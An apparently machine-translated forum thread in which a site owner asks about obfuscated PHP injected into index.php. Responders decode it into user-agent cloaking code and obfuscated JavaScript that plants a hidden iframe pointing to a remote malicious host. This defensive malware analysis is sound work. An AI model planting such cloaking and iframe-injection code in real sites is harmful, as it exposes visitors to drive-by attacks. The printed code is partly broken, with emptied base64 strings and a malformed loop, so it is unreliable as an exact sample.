All geek questions in one place

What is the secret code that was hacked into my site?

Possible duplicate:
eval base64_decode php virus

A few days ago, I noticed that none of my email scripts worked anymore. I asked the hosting provider, and they informed me that my hosting account was somehow hacked by spammers, and I reached the limit of "email per hour", which was a sign that some kind of website was hosted on my site malicious code that sent a huge amount of letters.

I just checked my code and I found this piece of secret code that was placed at the top of my index.php page. I absolutely do not know what he is doing, or how he can send an email if it somehow does not close to my email scripts. What is the secret code that was posted on my site?

Also, if I remove this code, should it fix my problems? Is there anything else I can find out if anything else has been added to my server? And I guess the only way to add code to the index.php file was that my account was hacked and they manually added it, so what can I do to prevent this from happening again?

The code that was posted on my home page:

eval(base64_decode('=='));
+4
source share
2 answers

This script:

 <?php echo (base64_decode('==')); ?>

Print this output:

 error_reporting(0); $bot = FALSE ; $ua = $_SERVER['HTTP_USER_AGENT']; $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android'); foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}} if (!$bot){ echo(base64_decode('=')); }

The second base64 decoder gives the following:

 <script>if(window.document)a=("v532b5".split+Date).substr(0,6);aa=([].reverse+[].reverse).substr(0,6);if(aa===a) f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,-30,-30,86];md='a';e=window.eval;w=f;s='';g='f'+'ro'+'mCh'+'ar'+'Cod'+'e';for(i=0;iw.length<0;i++){s=s+String[g](39+w[0+i]);} if(a===aa) e('e'+'('+'s'+')');</script>

If it detects that HTTP_USER_AGENT contains any of these sites, it sets $bot = true; If nothing is found, as in !$bot , then it prints this javascript.

The resulting iframe is as follows:

 <iframe src="http://kzkmynf.zyns.com/d/404.php?go=1" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

All that JavaScript is for generating an iframe that ends in 404. Thus, this has no effect, but creates a dead invisible iframe. Even more mysterious, http://zyns.com/ is a domain name registrar for free domain names, and the subdomain does not exist, but does not give 404. Who on the registrar gives this:

 Registrant: ChangeIP.com c/o Dynamic DNS Provider PO Box 2333 San Marcos, CA 92079 US Domain Name: ZYNS.COM Administrative Contact, Technical Contact: ChangeIP.com NSI@ChangeIP.com c/o Dynamic DNS Provider PO Box 2333 San Marcos, CA 92079 US 800-791-3367 fax: 760-621-0116

ChangeIP.com seems to own ZYNS.COM, and some anonymous users have created this subdomain and sent this malicious code.

I would delete it ...

+18
source

Dang, I was just about to publish when Aram first got there :-)

I would suggest that at least everything in your web directory is now suspicious, if not on the entire server. Removing code is a good idea, but the real question is how did they get it and what else did they put in there and where ... it is much more difficult to answer.

+3
source

Source: https://habr.com/ru/post/1394539/

More articles:


All Articles